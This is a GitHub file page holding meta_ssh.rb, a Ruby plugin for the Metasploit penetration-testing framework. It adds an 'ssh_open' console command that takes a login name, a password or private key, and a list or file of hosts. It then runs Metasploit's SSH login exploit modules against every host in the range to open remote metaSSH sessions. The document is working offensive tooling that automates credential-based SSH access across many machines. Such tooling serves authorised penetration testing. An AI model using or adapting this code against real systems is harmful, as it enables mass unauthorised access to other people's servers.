forked from dirtyfilthy/metassh
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmeta_ssh.rb
149 lines (116 loc) · 3.07 KB
/
meta_ssh.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
#
# $Id$
# $Revision$
#
# top level constant ?!
#ARCH_SSH = "ssh" #Tried as class variable without success
module Msf
###
#
# MetaSSH by alhazred
# Dispatcher additions by rageltman
#
###
class Plugin::MetaSSH < Msf::Plugin
#attr_accessor :framework
class MetaSSHCommandDispatcher
include Msf::Ui::Console::CommandDispatcher
# Displatcher name
def name
"metaSSH"
end
#Command list
def commands
{
"ssh_open" => "Open MetaSSH session"
}
end
#Our commands
def cmd_ssh_open_help
print_line("Usage: ssh_open [options] [hosts]")
print_line
print_line("OPTIONS:")
print_line(" -l Login Username")
print_line(" -c Credential, file or pass")
print_line(" -f File containing hosts (from -R output for instance)")
print_line(" -h Help Banner")
end
def cmd_ssh_open( *args )
opts = Rex::Parser::Arguments.new(
"-l" => [ true, "Login"],
"-c" => [ true, "Credentials (passwd or keyfile)"],
"-h" => [ false, "Command help"],
"-f" => [ false, "File containing hosts"]
)
#Parse the opts
ips = []
login = ''
cred = nil
hosts_file = ''
opts.parse(args) do |opt, idx, val|
case opt
when '-h'
cmd_ssh_open_help
return
when '-l'
login = val
when '-c'
cred = val
when '-f'
hosts_file = val
else
#guess it must be an address
ips << val
end
end
#Parse hosts file if exists
File.read(hosts_file).each_line do |ip|
ips << ip
end if File.file?(hosts_file)
#Configure our module
if File.file?(File.expand_path(cred))
mod = framework.modules.create('exploit/multi/ssh/login_pubkey')
mod.datastore['KEY_FILE'] = cred
else
mod = framework.modules.create('exploit/multi/ssh/login_password')
mod.datastore['PASS'] = cred
end
mod.datastore['USER'] = login
#Build our range walker
targets = Rex::Socket::RangeWalker.new(ips)
#Run against each IP in the rangewalker
targets.each do |ip|
print_good("Running #{mod.refname} against #{ip}")
mod.datastore['RHOST'] = ip
mod.exploit_simple(
'Payload' => 'ssh/metassh_session',
'Target' => mod.datastore['TARGET']
)
end
end
end #end dispatcher
def initialize( framework, opts )
super
# register our new arch type
::ARCH_TYPES << ::ARCH_SSH unless ::ARCH_TYPES.include?(::ARCH_SSH)
# add meta_ssh lib to the path
$:.unshift(File.join(File.dirname(__FILE__),"meta_ssh","lib"))
# load our modules
Rex::ThreadFactory.spawn("#{name} Module Loader", true) {
framework.modules.add_module_path(File.join(File.dirname(__FILE__),"meta_ssh","modules")).each do |m|
print_good("Added #{m.last} #{m.first.capitalize} modules for metaSSH")
end
}
# load the dispatcher
add_console_dispatcher( MetaSSHCommandDispatcher )
end
def cleanup
remove_console_dispatcher( 'metaSSH' )
$:.delete_if {|e| e =~ /meta_ssh\/lib/}
framework.modules.remove_module_path(File.join(File.dirname(__FILE__),"meta_ssh","modules"))
end
def name
"metaSSH"
end
end
end